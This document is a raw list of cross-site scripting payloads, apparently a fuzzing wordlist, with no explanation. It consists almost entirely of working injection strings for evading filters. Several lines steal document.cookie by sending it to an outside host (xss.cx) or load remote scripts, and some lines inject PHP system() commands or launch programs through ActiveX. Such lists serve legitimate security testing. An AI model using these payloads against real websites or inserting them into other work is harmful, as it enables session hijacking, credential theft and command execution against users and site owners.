<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
"/><object data=javascript:\u0061le%72t(1)>
<object data=javascript:\u0061le%72t(1)>
"/><object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>
"<object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>"
"><object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>",
<object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>
"/><object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"///><img id="b1" src=1 onerror='$.getScript("http://xss.cx.js", function() { c(); });'>'
"<option>'><button><img src=x onerror=confirm(0);></button></option>"
<option>'><button><img src=x onerror=confirm(0);></button></option>
"\"\/><option>'><button><img src=x onerror=confirm(1);></button></option>",
><option>'><button><img src=x onerror=confirm(1);></button></option>
<p hidden?={{hidden}}>123</p>
<p style="font-family:'foo&#x5c;27&#x5c;3bx:expr&#x65;ession(confirm(1))'">
?param1=<script>prompt(9);/*¶m2=*/</script>
$.parseHTML('<img src=xx:X onerror=confirm(1)>')
<?php echo $_SERVER['PHP_SELF']?>
</plaintext\></|\><plaintext/onmouseover=prompt(1)
?playerID=a\";))}catch(e){confirm(document.domain)}//
${@print(system($_SERVER['HTTP_USER_AGENT']))}
${@print(system(“whoami”))}
<q/oncut=confirm()
'/><q/oncut=open()>//
<q/oncut=open()>
>"><script>confirm('hi')</script>"<</a>value=""><script>confirm('hi')</script>"<"/>
.replace(/.+/,eval)//
<s "'"="" 000="">
"'"><s/000 "'"><s/000
"'"><s/000 "'"><s/000
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
<s[NULL]cript>confirm(1)</s[NULL]cript>'>Clickme</a>
<sVg><scRipt %00>confirm(1)
<<scr\0ipt/src=http://xss.cx/xss.js></script
<scri%00ipt>confirm(0);</script>
<scri%00pt>confirm(1);</scri%00pt>
"<scri%00pt>confirm(0);</scri%00pt>"
"\"><scri%00pt>confirm(0);</scri%00pt>",
<scri%00pt>confirm(0);</scri%00pt>
><scri%00pt>confirm(0);</scri%00pt>
<script>/* */confirm(1)/* */</script>
<script> function b() { return Safe.get(); } confirm(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) confirm(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
<script> (function (o) { function exploit(x) { if (x !== null) confirm('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>
<script /*%00*/>/*%00*/confirm(1)/*%00*/</script /*%00*/
<script ~~~>confirm(0%0)</script ~~~>
<script ^__^>confirm(String.fromCharCode(49))</script ^__^
'"`><script>/* **chr*log(*num*)// */</script>
<script>/* **chr*/log(*num*)// */</script>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<script> document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
<script for=_ event=onerror()>confirm(/@ma1/)</script><img id=_ src=>
<script for=document event=onreadystatechange>getElementById('safe123').click()</script>
<script itworksinallbrowsers>/*<script* */confirm(1)</script
<script itworksinallbrowsers>/*<script* */confirm(1)</script ?
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
<script> logChr0x09(1); </script>
<script src=>confirm(8)</script>
"/><script src="data:text/javascript,confirm(1)"></script>
<script src="data:text/javascript,confirm(1)"></script>
"<script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>"
"\"><script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>",
<script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>
><script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>
<script type="text/xaml"><Canvas Loaded="confirm" /></script>
<script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script>
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) confirm(c[1]); }catch(e){} }; xdr.send(); </script>
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
"/><script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script>#
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script>
<script> var+x+=+showModelessDialog+(this); confirm(x.document.cookie); </script>
"/><script x> confirm(1) </script 1=2
<script x> confirm(1) </script 1=2
<script/%00%00v%00%00>confirm(/@jackmasa/)</script> and %c0″//(%000000%0dconfirm(1)//
<script>({0:#0=confirm/#0#/#0#(0)})</script>
<script>(0)['constructor']['constructor']("\141\154\145\162\164(1)")();</script>
"<script>1-confirm(0);</script>"/>
"/><script>+-+-1-+-+confirm(1)</script>
<script>+-+-1-+-+confirm(1)</script>
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});confirm(Safe.get())</script>
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});confirm(Safe.get())</script>
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<script>a='abc\*chr*\';log(*num*)//def';</script>
"<script>'confirm(0)%3B<%2Fscript>"
"\"><script>'confirm(0)%3B<%2Fscript>",
<script>'confirm(0)%3B<%2Fscript>
><script>'confirm(0)%3B<%2Fscript>
"<script>confirm(0);</script>"
"><"script">"confirm(0)"</"script">
"\"><script>confirm(0)</script>",
<script>confirm(0);</script>
><script>confirm(0)</script>
"'><script>confirm(1)</script>",
<sc'+'ript>confirm(1)</script>
<script>confirm(1)</script>
>"<>"<script>confirm(1)</script>
[<script>]=*confirm(1)</script>
∀㸀㰀script㸀confirm(1)㰀/script㸀
<%<!--'%><script>confirm(1);</script -->
<%<!--'%><script>confirm(1);</script -->
"/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>
"\"/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>"
>"<>"<script>confirm(2)</script>
<script>confirm(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
"<script>confirm(String.fromCharCode(88,83,83));</script>"
"\"><script>confirm(String.fromCharCode(88,83,83));</script>",
<script>confirm(String.fromCharCode(88,83,83));</script>
><script>confirm(String.fromCharCode(88,83,83));</script>
<script>/*confirm("Woops");*/</script>
<script>confirm(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
<script>confirm(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
<script>confirm(document.head.childNodes[3].text)</script>
<script>confirm(document.head.innerHTML.substr(146,20));</script>
>"><script>confirm(document.location)</script>&
<script>confirm(""no")</script>
<script>confirm(x.y[0])</script>
<script>confirm(x.y.x.y.x.y[0]);confirm(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>
"'`><script>a=/xss;*chr*;i=0;log(*num*);a/i;</script>
"`'><script>*chr*log(*num*)</script>
<script>document.body.innerHTML="<h1>XSS-Here</h1>"</script>
<script>document.write(Array(184).join('<marquee>'))</script>
"/><script>document.write("<img src=//xss.cx/" + document.cookie + ">")</script>
<script>document.write("<img src=//xss.cx/" + document.cookie + ">")</script>
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });confirm(Safe.get.apply(null, arguments));})();</script>
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<script>if("x\*chr*".length==1) { log(*num*);}</script>
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
"`'><script>lo*chr*g(*num*)</script>
"`'><script>lo*chr*g(*num*)</script>
"'`><script>log*chr*(*num*)</script>
<script/onload=confirm(1)></script>
\"><script>prompt(1)</script>
</script><script>confirm(3)</script>
</script><script>/*var a="/*""'/**/;confirm(1);//</script>
<script>({set/**/$($){_/**/setter=$,_=1}}).$=confirm</script>
<script/src=data:text/javascript,alert(1)></script>
<script/src=data:text/javascript,alert(1)></script> ?
"/><script+src=data:,confirm(1)<!--
<script+src=data:,confirm(1)<!--
"/><script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ????????????
<script/src=//xss.cx>/*
<script>str='';for(i=0;i<0xefff;i++){str+='<script>AAAAAA';};document.write('<svg>'+str+'</svg>');</script>
</script><svg '//"
</script><svg onload='-/"/-confirm(1)//'
</script><svg onload='-/"/-confirm(1)//'"
<script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/v>confirm(/@jackmasa/)</script>
<script>-{valueOf:location,toString:[].pop,0:'vbscript:confirm%281%29',length:1}</script>
<script>var location={};</script>
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){confirm(request.responseText.substr(150,41));}</script>
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _confirm = confirm;confirm = function() { confirm = _confirm };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });confirm(get());})();};safe123.click();</script>#
`'"><script>window['log*chr*'](*num*)</script>
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
<script>x="confirm(1)".replace(/.+/,eval)//"</script>
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});confirm(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
<script>x=""!=prompt(9)!="";y=42;</script>
<script>x=""%prompt(9)%"";y=42;</script>
<script>x=""&&prompt(9)&&"";y=42;</script>
<script>x=""&prompt(9)&"";y=42;</script>
<script>x=""*prompt(9)*"";y=42;</script>
<script>x=""+prompt(9)+"";y=42;</script>
<script>x=""-prompt(9)-"";y=42;</script>
<script>x=""/prompt(9)/"";y=42;</script>
<script>x=""<<prompt(9)<<"";y=42;</script>
<script>x=""<=prompt(9)<="";y=42;</script>
<script>x=""<prompt(9)<"";y=42;</script>
<script>x=""===prompt(9)==="";y=42;</script>
<script>x=""==prompt(9)=="";y=42;</script>
<script>x="">=prompt(9)>="";y=42;</script>
<script>x="">>>prompt(9)>>>"";y=42;</script>
<script>x="">>prompt(9)>>"";y=42;</script>
<script>x="">prompt(9)>"";y=42;</script>
<script>x=""?prompt(9):"";y=42;</script>
<script>x=""^prompt(9)^"";y=42;</script>
<script>x=""|prompt(9)|"";y=42;</script>
<script>x=""||prompt(9)||"";y=42;</script>
"><scri<script></script>pt>confirm(document.cookie);</scri<script></script>pt>
<scri\x00pt>confirm(1);</scri%00pt>
setTimeout(['confirm(4)']);
<span id="x" data-constructor=oops></span><script>confirm(x.dataset.constructor)</script>
stop, open, print && confirm(1)
</style  ><script   :-(>/**/confirm(document.location)/**/</script   :-(
<style>body{font-size: 0;} h1{font-size: 12px !important;}</style><h1><?php echo "<hr />THIS IMAGE COULD ERASE YOUR WWW ACCOUNT, it shows you the PHP info instead...<hr />"; phpinfo(); __halt_compiler(); ?></h1>
<style>*{font-family:'Serif}';x[value=expression(confirm(URL=1));]{color:red}</style>
<style>*{-o-link:'data:text/html,<svg/onload=confirm(5)>';-o-link-source:current}</style><a href=1>aaa
<style/onload = !-confirm(1)>
<style/onload=confirm(1)>
<style/onload="javascript:if('[object Object]'=={}&&1==[1])confirm(1);">
<style/onload=<!--	> confirm (1)>
<style/onload=prompt('XSS')
<style>p[foo=bar{}*{-o-link:'javascript:confirm(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
<///style///><span %2F onmousemove='confirm(1)'>SPAN
<style>//<!--</style> -->*{x:expression(confirm(4))}//<style></style>
<svg contentScriptType=text/vbs><script>MsgBox+1
<svg contentScriptType=text/vbs><script>XSS
<svg id=1 onload=confirm(1)>
<svg onload=confirm(1)
"><svg onload="confirm(7)">
<svg onload="confirm(7)">
<svg onload=eval(URL)>
<svg onload=eval(document.cookie)>
<svg onload=eval(window.name)>
<svg xml:base="data:text/html,<script>confirm(1)</script>"><a xlink:href="#"><circle r="40"></circle></a></svg>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:confirm(1)"></g></svg>
<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:confirm(1)" begin="0s" dur="0.1s" fill="freeze"/>
<svg></ y="><x" onload=confirm(4)>
<svg><doh onload=confirm(1)>
<svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='confirm(1)'%3E%3C/svg%3E">
"<svg/onload=confirm(0);prompt(0);>"
<svg/onload=confirm(0);prompt(0);>
<svg/onload=confirm(1)
"/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>
"\"/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>"
<svg/onload='javascript0x00:void(0)%00?void(0):confirm(1)'>
"<svg/onload=prompt(0);>"
<svg/onload=prompt(0);>
"<svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>"
"\"><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>",
<svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>
><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>
<svg/onload=window.onerror=confirm;throw/5/;//
<svg/onload=window.onerror=confirm;throw/XSS/;//
<svg/onload=window.onerror=confirm;throw/XSS/;//"
<svg><script ?>confirm(1)
<svg><script ?>confirm(1);
<svg><script onlypossibleinopera:-)> confirm(1)
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js'
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script><![CDATA[\]]><![CDATA[u0061]]><![CDATA[lert]]>(1)</script>
"/><svg><script>//
confirm(1);</script </svg>
<svg><script>//
confirm(1);</script </svg>
<svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
<svg><script>confirm(/1/)</script>
<svg><script>confirm("");confirm('yes')//no")</script>
<svg><script>a<svg//onload=confirm(2) />lert(1)</script>
<svg><script>location=<>javascript&#x3A;confirm(1)<!/></script>
<svg><script>/**/confirm(3)//*/</script></svg>
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<svg><style>*{font-family:'<svg onload=confirm(1)>';}</style></svg>
<svg><style><img src=x onerror=confirm(1)></svg>
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>confirm(1)
?t=confirm(1)&k7="><svg/t='&k8='onload='/&k9=/+eval(t)'
test=scriptx=document.createElement(%27script%27);x.innerHTML=%27confirm(location)%27;document.body.appendChild(x);/script¬bot=UzXGjMCo8AoAAFUcKTEAAAAN
<textarea autofocus onfocus=confirm(3)>
<textarea id=ta onfocus=%22write('<script>confirm(1)</script>')%22 autofocus></textarea>
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520confirm(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
"/><textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<textarea name='file"; filename="test.<img src=a onerror=document&#46;location&#61;&#34;http:&#47;&#47;evil&#46;site&#34;>'>
"<textarea onmousemove='confirm(1);'>"
<textarea></textarea>test<!-- </textarea><img src=xx: onerror=confirm(1)> -->
</title><frameset><frame src="data:text/html, fill the whole page and overlap everything<script>confirm(1)</script>">
</title><frameset><frame src="data:text/html,<script>confirm(1)</script>">
<ul><li><svg onload="confirm(1)"></li></ul>
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:confirm(document.location);">
<var onmouseover="prompt(1)">On Mouse Over</var>
<var onmouseover="prompt(1)">On Mouse Over</var>?
"<video src=. onerror=prompt(0)>"
<video src=. onerror=prompt(0)>
<video src="x" onloadstart="confirm(1)">
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
<video><source o?UTF-8?Q?n?error="confirm(1)">
<x data-bind=".:confirm(1)">
<x data-bind=".:\u0061lert(1)">
<x onload'=confirm(1)
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
<
<
\x3C
>
>
\x3E
<
<
\x3c
>
>
\x3e
<xml id=cdcat><note><to>%26lt;span style=x:exp<![CDATA[r]]>ession(confirm(3))%26gt;hello%26lt;/span%26gt;</to></note></xml><table border=%221%22 datasrc=%22%23cdcat%22><tr><td><span datafld=%22to%22 DATAFORMATAS=html></span></td></tr></table>
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
<xmp><img alt="</xmp><img src=xx:x onerror=confirm(1)//">
xss--><!--<script>xss
x”</title><img src%3dx onerror%3dconfirm(1)>
@"><img src=x/onerror=confirm(1)>xss
<script>x=new ActiveXObject("WScript.Shell");x.run('calc');</script>
"><<x>script>confirm(2)<<x>/<x>script>
<img src=x onerror="document.location='http://xss.cx'";>
!#$%&'*+-/=?^_`{}|~@xss.cx
~~)1(trela+tpircsavaj'.split('').reverse().join('').split('~').join(String.fromCharCode(47)).split('+').join(String.fromCharCode(58))).concat('
<xml id=cdcat><note><to>%26lt;span style=x:exp<![CDATA[r]]>ession(confirm(3))%26gt;hello%26lt;/span%26gt;</to></note></xml><table border=%221%22 datasrc=%22%23cdcat%22><tr><td><span datafld=%22to%22 DATAFORMATAS=html></span></td></tr></table>
<style/></style><img src=1 onerror=confirm(1)></style>
<script>
x="<%";
</script>
<div title="%></script>"<img src=1 onerror=confirm(1)>"></div>
<? foo="><script>confirm(1)</script>">
data:text/html,/*<img src=x '-confirm(1)-' onerror=confirm(1)>*/confirm(1)
'">><marquee><img src=x onerror=confirm(1)></marquee>
<div contextmenu=x>right-click<menu id=x onshow=confirm(1)>
"><b/onclick="javascript:window.window.window['confirm'](1)">bold
<body language=vbs onload=window.location='data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+'>
<IFRAME/SRC=DATA:TEXT/HTML;BASE64,ICA8U0NSSVBUIC8NU1JDPSINSFRUUFM6DS8NDS8NSEVJREVSSS5DSC96DSINID4NPC9TQ1JJUFQNDT5>
%uff1cscript%uff1econfirm%uff0876310%uff09%uff1c/script%uff1e
<script>``.constructor.constructor`confirm\`1\````</script>
eval("\x61\x6c\x65\x72\x74\x28\x31\x29”)
<script>var%20x%20=%20“a”;%20confirm(1);//”;</script>
<source srcset="x"><img onerror="confirm(5)"></picture>
<svg><script>confirm`1`<p><svg><script>confirm`1`<p>
<script>``.constructor.constructor`confirm\`1\````</script>
<i/style=x=x/**/(confirm(1))('\')expression\')>
<i/style=x=x/**/n(confirm(1))('\')expressio\')>
<div style='x:anytext/**/xxxx/**/n(confirm(1)) ("\"))))))expressio\")'>aa</div> //
<script>write(“<img/src=//xss.cx/?”+cookie.replace(/\s/g,"")+“>”)></script>
<base href="javascript:\"> <a href="//%0aconfirm(2);//">XSS</a>
<base href="javascript:\"> <a href="//%0a%0dconfirm(2);//">XSS</a>
<base href="javascript:\"> <a href="//%00confirm(2);//">XSS</a>
<base href="javascript:\"> <a href="//xss.cx/xss.js">XSS</a>
<script src="//⒕₨"></script>)
<anything onmouseover=javascript:confirm(1)>
<%00/title>
<""/title>
</title"">
</title id="">
<a href='javascript:http://@cc_on/confirm%28location%29'>click</a>
<img src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==">
<a href="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="><img src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></a>
"> "><iframe src=http://xss.cx onload=confirm(5) <<iframe src=a> "><iframe src=http://xss.cx onload=confirm(8) <
% E2% 88% 80% E3% B8% 80% E3% B0% 80script% E3% B8% 80confirm% 281% 29% E3% B0 % 80 80/script% E3% B8%
"><svg/onload=prompt(1)>
"onresize=prompt(1)>
<svg/onload=prompt(1)
<svg><script>prompt(1)<b>
<svg><script>prompt(1)</script>
<script>eval.call`${'prompt\x281)'}`</script>
<script>prompt.call`${1}`</script>
--!><svg/onload=prompt(1)
<p class="comment" title=""><svg/a="></p>
<p class="comment" title=""onload='/*"></p>
<p class="comment" title="*/prompt(1)'"></p>
"><svg/a=#"onload='/*#*/prompt(1)'
"><script x=#"async=#"src="//⒛₨
[U+2028]prompt(1)[U+2028]-->
<ſvg><ſcript/href=//⒕₨>
<ſcript/async/src=//⒛₨>
<img src=""><SCRIPT/ASYNC/SRC="/〳⒛₨">
"><script>`#${prompt(1)}#`</script>
<iframe/*%%%%25%%%25*/src='javascript:vbscript:%0b%0a/**/;//:http://www.google.com/?=%0a/**/javascript:%0a/*oleeeeeeeeeeeeeee*/alert(2);'>
<A HREF="javascript	:alert(1)">
<%= puts "test" %>
'"--></style></script><script>alert(0x0009BE)</script>
<a href="javascript:history:alert(this.history.length)">click</a>
xss=<link rel=import href=http://xss.cx/xss.js >
<% a=%><iframe/onload=alert(1)//>
<%/z=%><p/onresize=alert(1)//>
<%/z=%><p/onresize=alert(1)//>
<xml/></xml><iframe/onload=alert(1)>
<xmp/></xmp><iframe/onload=alert(1)>
<comment/></comment><iframe/onload=alert(1)>
<fORm/hello^waf/aCTIon=j	avas	cript
:alert/**/(docu	ment.coo	kie)><InPuT/TyPe=submit
<iframe onload="(function*(){}).constructor('alert(location)')().next()">
<iframe%20onload="new%20Promise($=>alert(location))">
<iframe onload=alert.call(...[top,location])>
<iframe onload=`${alert(location)}`>
<title/></title><iframe/onload=alert(1)>
<element onpointerover=alert(1)>
<div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Bring-Mouse-Over-Me</div>
<element onpointerover=alert(1)>
<a b="c">d</a>
<![<CDATA[C%Ada b="c":]]]>
<![
<![C b="c">
<![CDb m="c">
<![CDAĹĹ@
<![CDAT<!
<!DOCTY
a=<script>alert(1);/*&b=*/</script>
<!DOCTY.
<?xml version="2.666666666666666666667666666">
<?xml standalone?>
